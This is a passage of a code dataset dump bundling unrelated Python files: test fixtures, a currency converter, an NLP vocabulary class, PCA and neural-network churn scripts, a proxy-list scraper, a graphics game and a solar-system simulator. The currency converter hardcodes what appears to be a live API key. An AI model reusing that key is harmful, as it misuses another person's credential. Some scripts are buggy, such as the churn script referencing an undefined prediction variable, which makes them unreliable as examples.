another_event_date]\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_event_type(db):\n return create_event_type(event_type='short course')\n\n\n@pytest.fixture(scope='function')\ndef sample_event_date(db, sample_event):\n return create_event_date(event_id=sample_event.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_event_date_without_event(db):\n return create_event_date()\n\n\n@pytest.fixture(scope='function')\ndef sample_fee(db, sample_event_type):\n return create_fee(fee=5, conc_fee=3, event_type_id=sample_event_type.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_reject_reason(db, sample_event):\n return create_reject_reason(sample_event.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_speaker(db):\n return create_speaker(name='Paul White')\n\n\n@pytest.fixture(scope='function')\ndef sample_user(db):\n return create_user(email='test_user@example.com', name='Test User')\n\n\n@pytest.fixture(scope='function')\ndef sample_admin_user(db):\n return create_user(email=TEST_ADMIN_USER, name='Admin User', access_area='admin')\n\n\n@pytest.fixture(scope='function')\ndef sample_venue(db):\n return create_venue()\n\n\n# token set around 2017-12-10T23:10:00\n@pytest.fixture(scope='function')\ndef sample_decoded_token():\n start, expiry = get_unixtime_start_and_expiry()\n\n return {\n 'jti': 'test',\n 'exp': expiry,\n 'iat': start,\n 'fresh': False,\n 'type': 'access',\n 'nbf': start,\n 'identity': 'admin'\n }\n\n\n@pytest.fixture\ndef sample_uuid():\n return '42111e2a-c990-4d38-a785-394277bbc30c'\n\n\ndef create_test_db_if_does_not_exist(db):\n try:\n conn = db.engine.connect()\n conn.close()\n\n except sqlalchemy.exc.OperationalError as e:\n if 'database \"{}\" does not exist'.format(TEST_DATABASE_URI.split('/')[-1:][0]) in e.message:\n db_url = sqlalchemy.engine.url.make_url(TEST_DATABASE_URI)\n dbname = db_url.database\n\n if db_url.drivername == 'postgresql':\n subprocess.call(['/usr/bin/env', 'createdb', dbname])\n else:\n raise\n\n\ndef request(url, method, data=None, headers=None):\n r = method(url, data=data, headers=headers)\n r.soup = BeautifulSoup(r.get_data(as_text=True), 'html.parser')\n return r\n\n\ndef create_authorization_header(client_id='testadmin'):\n expires = datetime.timedelta(minutes=1)\n\n token = create_access_token(identity=client_id, expires_delta=expires)\n return 'Authorization', 'Bearer {}'.format(token)\n\n\ndef create_refresh_header(client_id='testadmin'):\n token = create_refresh_token(identity=client_id)\n return 'Authorization', 'Bearer {}'.format(token)\n\n\ndef get_unixtime_start_and_expiry(year=2017, month=12, day=10, hour=23, minute=10):\n from time import mktime\n d = datetime.datetime(year, month, day, hour, minute, 0)\n unixtime = mktime(d.timetuple())\n\n added_time = 900\n unixtime_expiry = unixtime + added_time\n return unixtime, unixtime_expiry\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"606341398","text":"import requests, json, sys\nfrom tools.printer import print_msg, print_tool_name, get_input, clear_console\n\n# api_key=31120a6edf-52f0320c4e-qqu4cg\n\n\nall_codes = dict()\n\ndef get_amount():\n while True:\n try:\n return float(get_input(\"Enter Amount: \"))\n \n except KeyboardInterrupt:\n print_msg(\"warning\", \"\\nProgram Terminated!\\n\")\n exit()\n\n except Exception as e:\n print_msg(\"error\", e)\n continue\n\ndef get_all_codes(display=False):\n try:\n r_data = requests\\\n .get(\"https://api.fastforex.io/currencies?api_key=31120a6edf-52f0320c4e-qqu4cg\")\n\n return json.loads(r_data.content)['currencies']\n\n except requests.exceptions.ConnectionError:\n print_msg(\"error\", \"\\nUnable to Connect to Host! Please check your internet connection\\n\")\n exit()\n\ndef get_curr(payloads):\n try:\n response = requests\\\n .get(\"https://api.fastforex.io/fetch-one\", params=payloads)\n\n r_data = json.loads(response.content)\n\n if \"error\" in r_data:\n raise Exception(r_data['error'])\n\n return r_data\n\n except requests.exceptions.ConnectionError as e:\n print_msg(\"error\", e)\n return False\n\n except Exception as e:\n print_msg(\"error\", e)\n\ndef get_code(text):\n all_codes = get_all_codes()\n while True:\n try:\n code = get_input(text).upper()\n if code in all_codes:\n return code\n else:\n raise Exception(\"The Currency code --> {} does not exist\"\\\n .format(code))\n\n except KeyboardInterrupt:\n print_msg(\"warning\", \"\\nProgram Terminated!\\n\")\n exit()\n\n except Exception as e:\n print_msg(\"error\", e)\n continue\n\n\ndef convert():\n curr_from = get_code(\"Convert From: \")\n curr_to = get_code(\"Convert To: \")\n amount = get_amount()\n\n payloads = {\n \"from\":curr_from, \n \"to\": curr_to, \n \"api_key\":\"31120a6edf-52f0320c4e-qqu4cg\"\n }\n\n data = get_curr(payloads)\n if data != None:\n total = data['result'][curr_to] * amount\n print_msg(\"success\", \"\\n{}-{} ==> {}-{:.2f} \".format(\n curr_from, amount, curr_to, total\n ))\n\ndef converter():\n print_tool_name(\"Aboki $$\", \"Devvyhac\", \"Team Trace Techie\", \"github.com/devvyhac\")\n convert()\n\n","sub_path":"currency_converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402528971","text":"# Vocabulary\nfrom __future__ import division, print_function\n\nimport util.io as io\nimport sys\nfrom collections import defaultdict, Counter\nimport string\nimport nltk\nimport numpy as np\n\nclass Vocab:\n\n def __init__(self, fn = None):\n\n self.D = defaultdict()\n self.idx2word = defaultdict()\n\n # Punctuations.\n self.punc = set(list(string.punctuation))\n # Special tokens.\n self.special_tokens = ['', '', '']\n\n if fn:\n self.load(fn)\n\n\n def save(self, fn):\n io.save_json(self.D, fn)\n\n def load(self, fn):\n d = io.load_json(fn)\n assert(isinstance(d, dict) and '' in d)\n\n self.D = defaultdict(lambda: d[''], d)\n idx2word = [(idx, w) for w, idx in self.D.iteritems()]\n self.idx2word = defaultdict(lambda: '', idx2word)\n\n def __getitem__(self, x):\n if isinstance(x, int):\n return self.idx2word[x]\n else:\n return self.D[unicode(x)]\n\n def __len__(self):\n return len(self.D)\n\n def build_from_corpus(self, corpus, max_size = 100000, min_num = 5):\n '''\n corpus: The textual corpus to build vocabulary from. The format is [string].\n\n max_size: max size of the vocabulary\n min_num: min appearance number of a word that will be included in the vocabulary\n '''\n\n print('[vocab.py] building from corpus')\n\n # filter_words is a list of words that are not wanted to be in the vocabulary\n filter_words = self.punc\n\n # build the vocabulary\n print('>>> tokenizing...')\n # corpus_token = [nltk.word_tokenize(unicode(sent).lower()) for sent in corpus]\n # words = sum(corpus_token, [])\n words = []\n n_sent = len(corpus)\n for i, sent in enumerate(corpus):\n words += nltk.word_tokenize(unicode(sent).lower())\n if i % 100 == 0:\n print('\\r %.2f%%' % (100*i/n_sent), end = '')\n sys.stdout.flush()\n print('')\n\n\n print('>>> counting...')\n word_counter = Counter(words).most_common()\n words_t = [w for (w, c) in word_counter if c >= min_num and w not in filter_words]\n words_t = words_t[0:max_size]\n words_t = self.special_tokens + words_t\n\n print('>>> building dictionary')\n self.D = defaultdict(lambda: words_t.index(''), zip(words_t, range(len(words_t))))\n self.idx2word = defaultdict(lambda: '', zip(range(len(words_t)), words_t))\n\n def encode(self, sent, seq_length = None, decorate = True):\n '''\n Encode sentence(str) into index_seq([int])\n '''\n\n seq = [self.D[w] for w in nltk.word_tokenize(unicode(sent).lower()) if w not in self.punc]\n\n if decorate:\n seq = [self.D['']] + seq + [self.D['']]\n\n if seq_length:\n if len(seq) > seq_length:\n seq = seq[0:seq_length]\n else:\n seq += [self.D['']] * (seq_length - len(seq))\n\n return seq\n\n def decode(self, seq):\n '''\n Decode sentence(str) from seq([word_index])\n '''\n tokens = []\n for idx in seq:\n w = self.idx2word[idx]\n if w == '':\n continue\n elif w == '':\n break\n else:\n tokens.append(w)\n return ' '.join(tokens)\n\n\n def encode_batch(self, sents, seq_length):\n '''\n Encode a batch of sentences. The sequecnes will be truncated to the same size\n '''\n\n seqs = [self.encode(sent, seq_length + 1, decorate = True) for sent in sents]\n\n seqs_input = [seq[0:seq_length] for seq in seqs]\n seqs_target = [seq[1::] for seq in seqs]\n \n # mask where is 0 and other token is 1\n v = np.where(np.array(seqs_target) == self.D[''], 0, 1) \n seq_mask = np.where(v[:,::-1].cumsum(1)[:,::-1] > 0, 1, 0).tolist()\n\n return seqs_input, seqs_target, seq_mask\n","sub_path":"modules/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"273565905","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 24 13:51:14 2017\r\n\r\n@author: hyungu\r\n\"\"\"\r\n\r\n# Import modules\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\r\nsns.set_style('whitegrid')\r\n\r\n\r\n# Import data\r\ndata = pd.read_csv(\"./0_Data/BreastCancerWisconsin.csv\")\r\nprint(\"- Data has {} rows and {} columns.\".format(*data.shape))\r\nprint(\"- Column names: \", list(data.columns))\r\n\r\n\r\n# Split dataset into X and y\r\nX = data.drop(['diagnosis'], axis=1)\r\nX = X.iloc[:, :10]\r\ny = data['diagnosis']\r\n\r\n\r\n# Standardize data onto unit scale (mean=0 and variance=1)\r\nX = StandardScaler().fit_transform(X)\r\n\r\n\r\n# Perform PCA\r\npca = PCA(n_components=None)\r\nZ = pca.fit_transform(X)\r\nprint(\"- Shape of transformed data: \", Z.shape)\r\n\r\n\r\n# Explained variance ratio of principal components\r\nnum_components = pca.n_components_\r\nexp_var = pca.explained_variance_ratio_\r\ncum_exp_var = np.cumsum(exp_var)\r\n\r\n\r\n# Plot explained variance ratio and cumulative sums\r\nplt.figure(num=1, figsize=(7, 7))\r\nplt.bar(range(num_components), exp_var, alpha=0.5, label='individual explained variance')\r\nplt.step(range(num_components), cum_exp_var, label='cumulative explained variance')\r\nplt.xlabel('Principal components')\r\nplt.ylabel('Explained variance ratio')\r\nplt.legend(loc='best')\r\nplt.show()\r\n\r\n\r\n# Plot the transformed data (Z) with 2 PCs\r\nplt.figure(num=2, figsize=(7, 7))\r\nfor label, color, marker in zip(('B', 'M'), ('blue', 'red'), ('o', '^')):\r\n plt.scatter(Z[y == label, 0], Z[y == label, 1],\r\n label=label, color=color, marker=marker, alpha=0.5)\r\nplt.xlabel('Principal Component 1')\r\nplt.ylabel('Principal Component 2')\r\nplt.legend(loc='best')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n\r\n# Plot the transformed data (Z) with 3 PCs\r\nfig = plt.figure(num=3, figsize=(7, 7))\r\nax = fig.add_subplot(111, projection='3d')\r\nfor label, color, marker in zip(('B', 'M'), ('blue', 'red'), ('o', '^')):\r\n ax.scatter(Z[y == label, 0], Z[y == label, 1], Z[y == label, 2],\r\n label=label, color=color, marker=marker, alpha=0.5)\r\nax.set_xlabel('Principal Component 1')\r\nax.set_ylabel('Principal Component 2')\r\nax.set_zlabel('Principal Component 3')\r\nax.legend(loc='best')\r\nplt.show(fig)\r\n","sub_path":"sklearn_2017/1일차_실습자료/5_PCA/PrincipalComponentAnalysis.py","file_name":"PrincipalComponentAnalysis.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"478763100","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport re\nimport logging\n\nimport os\nimport sys\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nfrom agent import Agent\nfrom util.webRequest import WebRequest\n\nlogger = logging.getLogger(__name__)\n\n\n@Agent.register\nclass FreeProxy(Agent):\n def __init__(self):\n self.url = 'https://free-proxy-list.net/'\n self.re_ip_port_pattern = re.compile(\n r\"(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})(\\d{1,5})\", re.I)\n\n def extract_proxy(self, page_num=0):\n try:\n rp = WebRequest().get(self.url.format(page=page_num), timeout=10)\n re_ip_port_result = self.re_ip_port_pattern.findall(rp.text)\n for host, port in re_ip_port_result:\n yield f'{host}:{port}'\n\n except:\n pass\n\n\nif __name__ == '__main__':\n p = Agent.proxies[0]()\n for proxy in p.extract_proxy():\n print(proxy)\n","sub_path":"agent/free_proxy.py","file_name":"free_proxy.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"393891435","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 14 21:24:48 2020\n\n@author: encry973r\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n# import dataset\ndata = pd.read_csv('Churn_Modelling.csv')\n\n# matrix of features and dependent variable\nX = data.iloc[:, 3:13].values\ny = data.iloc[:, 13].values\n\n# convert country column to dummies\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\n# ct for the country dimension\nct = ColumnTransformer(transformers=[('one_hot_encoder', \n OneHotEncoder(categories='auto'),\n [1])],\n remainder='passthrough')\nX = ct.fit_transform(X)\n# drop first dummie column\nX = X[:, 1:]\n\n# ct for the gender dimension\nct = ColumnTransformer(transformers=[('one_hot_encoder',\n OneHotEncoder(categories='auto'),\n [3])],\n remainder='passthrough')\nX = ct.fit_transform(X)\n# drop first dummie column\nX = X[:, 1:]\n\n# split dataset into train and test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.2, random_state=0)\n\n# feature scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n# copies for reference\nX_train2 = X_train.copy()\nX_test2 = X_test.copy()\n\n# dimensional reduction : PCA , n_components = 6 ; gave 62.81%\nfrom sklearn.decomposition import PCA\npca = PCA(n_components=6)\nX_train = pca.fit_transform(X_train)\nX_test = pca.transform(X_test)\nexplained_variance_ratio = pca.explained_variance_ratio_\n\n# build ANN\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nclassifier = Sequential()\n# add input and first hidden layer\nclassifier.add(Dense(units=12, kernel_initializer='uniform', activation='relu', input_dim=6))\n# add second hidden layer\nclassifier.add(Dense(units=12, kernel_initializer='uniform', activation='relu'))\n# add out put layer\nclassifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n# fit ANN to train dataset\nclassifier.fit(X_train, y_train, batch_size=10, epochs=100)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Build ANN architecture\n# import keras\n# from keras.models import Sequential\n# from keras.layers import Dense\n\n# initialize the classifier\n# classifier = Sequential()\n\n# accuracy\n# units = 6, accuracy = 83.41%\n# units = 11, accuracy = 86.68%\n\n# add input and first hidden\n# classifier.add(Dense(units=11, kernel_initializer='uniform', activation='relu', input_dim=11))\n# # add second hidden layer\n# classifier.add(Dense(units=11, kernel_initializer='uniform', activation='relu'))\n# # output layer\n# classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n# # compile network\n# classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# # fit data to classifier\n# classifier.fit(X_train, y_train, batch_size=10, epochs=100)\n\n# # predict for X_test\n# y_pred = classifier.predict(X_test)\n# y_pred = (y_pred > 0.5)\n\n# decision tree classifier\n# 80.25% accuracy\n# from sklearn.tree import DecisionTreeClassifier\n# classifier = DecisionTreeClassifier(criterion='entropy', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# Random Forest Classifier\n# 86.85% accuracy\n# from sklearn.ensemble import RandomForestClassifier\n# classifier = RandomForestClassifier(n_estimators=300, criterion='entropy', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# kernel svm\n# 86.85% accuracy\n# from sklearn.svm import SVC\n# classifier = SVC(kernel='rbf', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# poly svm\n# 85.7% accuracy\n# from sklearn.svm import SVC\n# classifier = SVC(kernel='poly', degree=3, random_state=0)\n# classifier.fit(X_train, y_train)\n\n# kmeans\n# 82.95% accuracy\n# from sklearn.naive_bayes import GaussianNB\n# classifier = GaussianNB()\n# classifier.fit(X_train, y_train)\n\n# KNN\n# 82.7% accuracy\n# from sklearn.neighbors import KNeighborsClassifier\n# classifier = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2)\n# classifier.fit(X_train, y_train)\n\n\n# # predict for X_test\n# y_pred = classifier.predict(X_test)\n\n\n# show confusion matrix\nfrom sklearn.metrics import confusion_matrix \ncm = confusion_matrix(y_test, y_pred) \n\n# truth = ((cm[0, 0] + cm[1, 1])/cm.sum())*100\n\n# print(str(truth) + '%')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"7DeepLearning/ANN/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"64924197","text":"### Joseph Rice 10/2/2017\r\n##\r\n##### Plan for this code down below\r\n##\"\"\" 1. Set the background up for the target\r\n## 2. Get the circles asighned to spasific points trough mouse clicks\r\n## 3. Get the sum of the scores computed on the graphic window\r\n##\r\n## \"\"\" \r\n##\r\n##\r\n##\r\n##\r\n\r\n\r\nmaxX=minY = 10\r\nmaxY=minX = -10\r\n\r\nfrom graphics import *\r\n\"\"\" THIS SETS THE GRAPH WIN UP \"\"\" \r\nfrom math import pi as PIE\r\nfrom math import sqrt\r\nwin = GraphWin(\"Archer Target\", 600,600)\r\nwin.setCoords(minX,minY,maxX,maxY)\r\nwin.setBackground(\"green\")\r\n\r\n## CODE FOR CIRCLES \r\ncenter = Point(0,0)\r\nc_white = Circle(center,5)\r\nc_white.setFill(\"white\")\r\nc_white.draw(win)\r\n\r\nc_black = Circle(center,4)\r\nc_black.setFill(\"purple\")\r\nc_black.draw(win)\r\n\r\ncblue = Circle(center,3)\r\ncblue.setFill(\"Blue\")\r\ncblue.draw(win)\r\n\r\nc_red = Circle(center,2)\r\nc_red.setFill(\"red\")\r\nc_red.draw(win)\r\n \r\nc_yellow = Circle(center, 1)\r\nc_yellow.setFill(\"yellow\")\r\nc_yellow.draw(win)\r\n\r\nTotal_score = Text(Point(0,-9),\"NO RULES!!!!!!!!!!\")\r\n\r\nTotal_score.draw(win)\r\nmessage = Text(Point(0,6), \"Click To Shot Arrow\")\r\nmessage.setStyle(\"bold\")\r\nmessage.draw(win)\r\n\r\n## list for storage \r\ntotal_score = []\r\n\r\n## TEST CODE \r\nTry_1 = win.getMouse()\r\nend_of_arrow = Point(-2,4)\r\n## function for the calulation of radius\r\ndef radus(x,y):\r\n r = sqrt(x**2 + y**2)\r\n return r \r\n## TEST FUNCTION CODE\r\n##value = radus(3,4) \r\n##print(value)\r\n\r\n### function for the logic gate.\r\ndef score(r):\r\n if r <=1:\r\n value = 9\r\n elif r <=2:\r\n value = 7 \r\n elif r <=3:\r\n \r\n value = 5\r\n elif r <=4:\r\n \r\n value = 3\r\n elif r <=5:\r\n \r\n value = 2\r\n else:\r\n \r\n value = 0\r\n return value\r\n\r\nr = radus(Try_1.getX(),Try_1.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New = str(value) + \" Points!\"\r\nTotal_score.setText(message_New)\r\n\r\n## \r\nline = Circle(Point(Try_1.getX(),Try_1.getY()),0.1)\r\nline.setFill(\"black\")\r\nline.draw(win)\r\n\r\nTry_2 = win.getMouse()\r\nr = radus(Try_2.getX(),Try_2.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New2 = str(value) + \" Points !\"\r\nTotal_score.setText(message_New2)\r\n\r\ncir = Circle(Point(Try_2.getX(),Try_2.getY()),0.1)\r\ncir.setFill(\"black\")\r\ncir.draw(win)\r\n\r\nTry_3 = win.getMouse()\r\nr = radus(Try_3.getX(),Try_3.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New3 = str(value) + ' Points !'\r\nTotal_score.setText(message_New3)\r\n\r\ncir_3 = Circle(Point(Try_3.getX(),Try_2.getY()),0.1)\r\ncir_3.setFill(\"black\")\r\ncir_3.draw(win)\r\n\r\nTry_4 = win.getMouse()\r\nr = radus(Try_4.getX(),Try_4.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New4 = str(value) + ' Points !'\r\nTotal_score.setText(message_New4)\r\n\r\ncir_4 = Circle(Point(Try_4.getX(),Try_4.getY()),0.1)\r\ncir_4.setFill(\"black\")\r\ncir_4.draw(win)\r\n\r\nTry_5 = win.getMouse()\r\nr = radus(Try_5.getX(),Try_5.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New5 = str(value) + \" Points !\"\r\nTotal_score.setText(message_New5)\r\n\r\ncir_5 = Circle(Point(Try_5.getX(),Try_5.getY()),0.1)\r\ncir_5.setFill(\"black\")\r\ncir_5.draw(win)\r\n\r\nmessage.setText(\"click to see total\")\r\nwin.getMouse()\r\naddition = 0\r\n\r\n\r\nfor i in total_score:\r\n number_value = int(i)\r\n addition = number_value + addition\r\n\r\nmessage.setText(\"Your final score is:{0:7}\".format(addition))\r\n\r\nwin.getMouse()\r\n\r\nwin.close()\r\n\r\n","sub_path":"Archer_Target.py","file_name":"Archer_Target.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"382668868","text":"def seperate(numbers, threshold):\n thresholdAndOver = []\n thresholdUnder = []\n for i in range(len(numbers)):\n if numbers[i] >= threshold: thresholdAndOver.append(numbers[i])\n else: thresholdUnder.append(numbers[i])\n return thresholdAndOver,thresholdUnder\n\n\na = [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nover,under = seperate(a,5)\n\nprint(over,under)\n\n\ndef multiplication_table(n):\n a=[]\n for i in range(1,n+1):\n for j in range(1,n+1):\n mul = i * j\n a.append(mul)\n print(a)\n for k in range(1,n+1):\n a.pop()\n return a\n\nprint(multiplication_table(4))","sub_path":"øvinger 7/gangetabell og lister.py","file_name":"gangetabell og lister.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"282426430","text":"from django.db import models\nfrom django.conf import settings\nfrom event.models import Event\n\n\n# Create your models here.\n\n\nclass Order(models.Model):\n\tuser = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n\tevent = models.ForeignKey(Event, on_delete=models.CASCADE)\n\tprice = models.BigIntegerField('event price', default=0)\n\tdate = models.DateTimeField(auto_now=True)\n\n\tdef __str__(self):\n\t\treturn f'{self.user.username} buy {self.event.title_event}'","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"311574549","text":"import numpy as np\n\n\nclass SixSigma ():\n\n '''Implementation of SixSigma method for anomaly detection.\n Six Sigma uses three standard deviations below the mean and three standard deviations\n above the mean to predict anomalies.\n\n Attributes:\n time_window : type int (default = 2)\n 'window size -> number of samples used for calculating the mean and standard deviation'\n\n Example shown in test_six_sigma.py\n '''\n\n\n def __init__(self,time_window=2):\n\n self.time_window = time_window\n self.buffer = []\n\n\n def fit (self,X,y):\n\n '''fit the model. Adjust buffer to obtain only the last time_window number of samples'''\n\n self.buffer.append(X)\n self.buffer = self.buffer[-self.time_window:]\n\n def predict (self,X):\n\n '''predict class for passed data. '''\n\n if len(self.buffer) < self.time_window:\n return None\n else:\n j = 0\n while j < len(X):\n i = 0\n feature_array =[]\n while i < len(self.buffer):\n feature_array.append(self.buffer[i][j])\n i += 1\n average = np.mean(feature_array)\n sigma = np.std(feature_array)\n prediction = int(abs(X[j]) > abs(average) + 3 * abs(sigma))\n if prediction == 1:\n break\n j+=1\n return prediction\n\n","sub_path":"src/skmultiflow/anomaly_detection/six_sigma.py","file_name":"six_sigma.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"41267989","text":"import logging\nimport dtlpy as dl\nfrom importlib import import_module\nfrom plugin_utils import maybe_download_data\nlogger = logging.getLogger(__name__)\n\n\nclass PluginRunner(dl.BasePluginRunner):\n \"\"\"\n Plugin runner class\n\n \"\"\"\n\n def __init__(self, plugin_name):\n self.plugin_name = plugin_name\n pass\n\n def run(self, dataset, model_specs, hp_values, configs=None, progress=None):\n\n maybe_download_data(dataset)\n\n # get project\n # project = dataset.project\n # assert isinstance(project, dl.entities.Project)\n\n # start tune\n cls = getattr(import_module('.adapter', 'zoo.' + model_specs['name']), 'AdapterModel')\n\n final = 1 if self.plugin_name == 'trainer' else 0\n devices = {'gpu_index': 0}\n\n adapter = cls(devices, model_specs, hp_values, final)\n if hasattr(adapter, 'reformat'):\n adapter.reformat()\n if hasattr(adapter, 'data_loader'):\n adapter.data_loader()\n if hasattr(adapter, 'preprocess'):\n adapter.preprocess()\n if hasattr(adapter, 'build'):\n adapter.build()\n adapter.train()\n\n if final:\n return adapter.get_checkpoint()\n else:\n metrics = adapter.get_metrics()\n if type(metrics) is not dict:\n raise Exception('adapter, get_metrics method must return dict object')\n if type(metrics['val_accuracy']) is not float:\n raise Exception(\n 'adapter, get_metrics method must return dict with only python floats. '\n 'Not numpy floats or any other objects like that')\n return metrics\n\n # pipeline_id = str(uuid.uuid1())\n # local_path = os.path.join(os.getcwd(), pipeline_id)\n #\n # #####################\n # # upload for resume #\n # #####################\n # project.artifacts.upload(plugin_name='tuner',\n # session_id=pipeline_id,\n # local_path=local_path)\n #\n # #######################\n # # download for resume #\n # #######################\n # project.artifacts.download(plugin_name='tuner',\n # session_id=pipeline_id,\n # local_path=local_path)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"304848463","text":"from Planet import *\nfrom Spaceship import *\nfrom Frame import *\nfrom Maths import *\nimport time\n\nframe = Frame()\n\nobjects = []\n\nsoleil = Planet(None, \"Soleil\", 1.99e30, 1.39e6, 0, 0)\nsoleil.x = frame.frame.winfo_screenwidth()/2\nsoleil.y = frame.frame.winfo_screenheight()/2\n\nmercure = Planet(soleil, \"Mercure\", 3.29e23, 4.88e3, 5.79e7, 308)\nvenus = Planet(soleil, \"Venus\", 4.87e24, 1.21e4, 1.08e8, 168)\nterre = Planet(soleil, \"Terre\", 5.97e24, 1.27e4, 1.49e8, 175)\nlune = Planet(terre, \"Lune\", 7.35e22, 3.47e3, 3.84e5, 113.8)\nmars = Planet(soleil, \"Mars\", 6.42e23, 6.78e3, 2.27e8, 313)\njupiter = Planet(soleil, \"Jupiter\", 1.90e27, 1.40e5, 7.79e8, 309) \nsaturne = Planet(soleil, \"Saturne\", 5.68e26, 1.16e5, 1.42e9, 168)\nuranus = Planet(soleil, \"Uranus\", 8.68e25, 5.07e4, 2.88e9, 353)\nneptune = Planet(soleil, \"Neptune\", 1.02e26, 4.92e4, 4.50e9, 324)\n\nvaisseau = Spaceship(300, 300)\n\nobjects.append(soleil)\nobjects.append(mercure)\nobjects.append(venus)\nobjects.append(terre)\nobjects.append(lune)\nobjects.append(mars)\nobjects.append(jupiter)\nobjects.append(saturne)\nobjects.append(uranus)\nobjects.append(neptune)\nobjects.append(vaisseau)\n\n##Boucle principale\nFPS=60\nsleepTime = 1/FPS\nelapsed = 0 #Temps écoulé\nstartloop = time.time() \n\ndef upPos():\n if vaisseau.x < vaisseau.photo.width()/2:\n setSpeedScrollX(-vaisseau.speedX)\n elif vaisseau.x > frame.frameW - vaisseau.photo.width():\n setSpeedScrollX(-vaisseau.speedX)\n else:\n setSpeedScrollX(0)\n\n if vaisseau.y < vaisseau.photo.height()/2:\n setSpeedScrollY(-vaisseau.speedY)\n elif vaisseau.y > frame.frameH + vaisseau.photo.height():\n setSpeedScrollY(-vaisseau.speedY)\n else:\n setSpeedScrollY(0)\n \nwhile True:\n #Le temps qu'il s'est écoulé depuis le dernier tour de boucle\n delta = time.time()-startloop\n startloop = time.time()\n \n increaseTime=frame.time.get()*2.628e6 #Convertie les mois en secondes\n frame.univers.delete('all')\n \n #Parcours tous les objets, les actualise et les affiche\n for i in range(len(objects)):\n obj = objects[i]\n obj.move(delta*increaseTime)\n frame.draw(obj)\n frame.setInfos(round(vaisseau.x), round(vaisseau.y), elapsed)\n \n TRC = PFD(vaisseau, objects, soleil)\n #On convertie le TRC qui est en mètre en km\n vaisseau.accelX = convertDist(TRC[0]*10**-3)\n vaisseau.accelY = convertDist(TRC[1]*10**-3)\n \n upPos()\n \n #Si l'utilisateur a cliqué affiche les infos de la planète\n if getClicked():\n infoPlanet = getInfoPlanet(getPlanetClicked(objects, getMousePos()))\n #S'il n'a pas cliqué en dehors d'une planète \n if infoPlanet != None:\n frame.createPopup(infoPlanet)\n setClicked(False)\n \n frame.frame.update()\n time.sleep(sleepTime)\n elapsed += 